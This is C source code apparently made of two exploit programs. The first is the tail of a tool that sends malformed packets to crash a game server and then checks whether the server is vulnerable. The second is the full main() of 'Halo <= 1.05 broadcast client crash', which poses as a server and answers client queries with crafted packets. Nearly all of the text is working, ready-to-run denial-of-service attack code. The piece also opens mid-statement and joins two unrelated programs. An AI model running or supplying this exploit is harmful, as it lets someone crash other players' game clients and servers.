6)) { fputs("- Alert: the server is full so this attack will fail\n\n", stdout); } fputs("- send BOOM packet\n", stdout); switch(atoi(argv[1])) { case 1: { pck[5] = 0xff; // major than 0x7f *(u_short *)(pck + 1) = sizeof(pck) - 4; SEND(pck, sizeof(pck) - 1); } break; case 2: { p = buff; *p++ = 0x7f; p += 2; // data size ADDSHORT(0); // don't know, pck related? ADDTEXT("Unnamed Player"); // PlayerName ADDTEXT("unexistent"); // PlayerModel ADDSHORT(65); // PlayerMaxLife ADDTEXT("unexistent"); // PilotModel ADDTEXT("unexistent"); // Motor0Model ADDTEXT("unexistent"); // Motor1Model ADDTEXT("unexistent"); // Motor2Model ADDTEXT("unexistent"); // Motor3Model ADDTEXT("1,3,0,0,1,0,1"); // WeaponBayList ADDLONG(0); // PlayerTeamID *(u_short *)(buff + 1) = (p - buff) - 3; SEND(buff, p - buff); } break; case 3: { *(u_short *)(pck + 1) = 1; // major than 0 SEND(pck, 5); } break; case 4: { SEND(pck, 1); sleep(ONESEC); *(u_short *)(pck + 1) = 0; SEND(pck, 3); } break; default: { fputs("\nError: wrong attack selected\n\n", stdout); exit(1); } } fputs("- check server:\n", stdout); SEND(info, sizeof(info) - 1); if(timeout(sd) < 0) { fputs("\nServer IS vulnerable!!!\n\n", stdout); } else { fputs("\nServer doesn't seem vulnerable\n\n", stdout); } close(sd); return(0); }
int main(int argc, char *argv[]) { int sd, len, on = 1, i, iver, psz; struct sockaddr_in peer; u_char buff[BUFFSZ + 1], *pck, pcklan[] = "\x00\x00\x00\x00\x00" "hostname\0" BOOM "\0" /* not only here */ "gamever\0" GAMEVER "\0" "hostport\0" "\0" "maxplayers\0" "16\0" "password\0" "0\0" "mapname\0" "longest\0" "dedicated\0" "1\0" "gamemode\0" "openplaying\0" "game_classic\0" "0\0" "numplayers\0" "0\0" "gametype\0" "CTF\0" "teamplay\0" "1\0" "gamevariant\0" "\0" "fraglimit\0" "3\0" "player_flags\0" "1943015556,2\0" "game_flags\0" "65\0" "\0" "\0", pckinternet[] = "\x00\x00\x00\x00\x00" BOOM "\0" GAMEVER "\0" "0\0" "CTF\0" "openplaying\0" "0\0" "16\0"; setbuf(stdout, NULL); fputs("\n" "Halo <= 1.05 broadcast client crash "VER"\n" "by Luigi Auriemma\n" "e-mail: [email protected]\n" "web: http://aluigi.altervista.org\n" "\n", stdout); if(argc < 2) { printf("\n" "Usage: %s <version>\n" "\n" " You must decide what version of the clients you want to crash:\n" "\n", argv[0]); for(i = 0; *versions[i]; i++) { printf(" %s\t%s\n", versions[i][0], versions[i][1]); } fputc('\n', stdout); exit(1); } for(iver = 0; versions[iver][0]; iver++) { if(!strcmp(argv[1], versions[iver][0])) break; } if(!versions[iver][0]) { printf("\nError: you must choose between the versions listed at the beginning\n"); exit(1); } printf("- version: %s \t%s\n", versions[iver][0], versions[iver][1]); for(i = 0; i < (sizeof(pcklan) - 14); i++) { if(!memcmp(pcklan + i, GAMEVER, 13)) { memcpy(pcklan + i, versions[iver][1], 13); break; } } for(i = 0; i < (sizeof(pckinternet) - 14); i++) { if(!memcmp(pckinternet + i, GAMEVER, 13)) { memcpy(pckinternet + i, versions[iver][1], 13); break; } } #ifdef WIN32 WSADATA wsadata; WSAStartup(MAKEWORD(1,0), &wsadata); #endif peer.sin_addr.s_addr = INADDR_ANY; peer.sin_port = htons(PORT); peer.sin_family = AF_INET; psz = sizeof(peer); sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if(sd < 0) std_err(); printf("- bind UDP port %d\n", PORT); if(setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on)) < 0) std_err(); if(bind(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) std_err(); fputs("\nClients:\n", stdout); while(1) { len = recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer, &psz); if(len < 0) std_err(); if(buff[2]) { printf("PING %s:%hu\n", inet_ntoa(peer.sin_addr), htons(peer.sin_port)); if(sendto(sd, PING, sizeof(PING) - 1, 0, (struct sockaddr *)&peer, sizeof(peer)) < 0) std_err(); continue; } if(len == 10) { fputs("LAN ", stdout); pck = pcklan; len = sizeof(pcklan) - 1; } else { fputs("INTERNET ", stdout); pck = pckinternet; len = sizeof(pckinternet) - 1; } printf("%s:%hu\n", inet_ntoa(peer.sin_addr), htons(peer.sin_port)); memcpy(pck, buff + 2, 5); if(sendto(sd, pck, len, 0, (struct sockaddr *)&peer, sizeof(peer)) < 0) std_err(); } close(sd); return(0); }